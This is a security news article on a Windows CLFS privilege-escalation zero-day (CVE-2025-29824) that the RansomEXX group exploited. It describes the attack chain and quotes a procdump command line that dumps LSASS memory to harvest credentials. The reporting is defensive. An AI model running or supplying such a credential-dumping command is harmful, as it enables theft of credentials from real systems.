Microsoft Patches Privilege Escalation Bug Used by RansomEXX in Targeted Attacks

A newly patched Windows zero-day vulnerability, released as part of this month's April 2025 Patch Tuesday and tracked as CVE-2025-29824, was found to have been actively exploited by a ransomware group tracked by Microsoft as Storm-2460, also known as RansomEXX. The flaw exists in the Windows Common Log File System (CLFS) driver and permits local privilege escalation through a use-after-free condition. Microsoft confirmed exploitation of the vulnerability in attacks targeting "organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia." The abuse of this now remediated flaw involved a series of post-compromise activities to elevate privileges and deploy ransomware payloads.

The initial access vector associated with the exploitation of the CVE-2025-29824 vulnerability remains undetermined. However, known details of Storm-2460 behaviors prior to exploitation have included the use of "certutil.exe" to fetch payloads in "multiple cases," Microsoft reports. Payloads downloaded have included a malicious MSBuild file carrying an encrypted payload identified as the PipeMagic malware. Once decrypted, the malware launched the CLFS exploit through the "dllhost.exe" process. The exploit leveraged "NtQuerySystemInformation" and "RtlSetAllBits" to escalate privileges, creating a CLFS file at “C:\ProgramData\SkyPDF\PDUDrv.blf.” After successful exploitation, the malware was injected into "winlogon.exe", which then launched "dllhost.exe" again to run the Sysinternals "procdump.exe" tool using the command: C:\Windows\system32\dllhost.exe -accepteula -r -ma lsass.exe c:\programdata[random letters]. This was used to dump LSASS memory and harvest credentials. Ransomware execution followed, with a ransom note named !READ_ME_REXX2!.txt. In one case, "notepad.exe" was executed under the SYSTEM context.

Given this vulnerability’s exploitation, patching is urged to be conducted as soon as possible. The scope of the vulnerability does not apply to organizations "running Windows 11, version 24H2," as Microsoft notes these systems "are not affected by the observed exploitation, even if the vulnerability was present."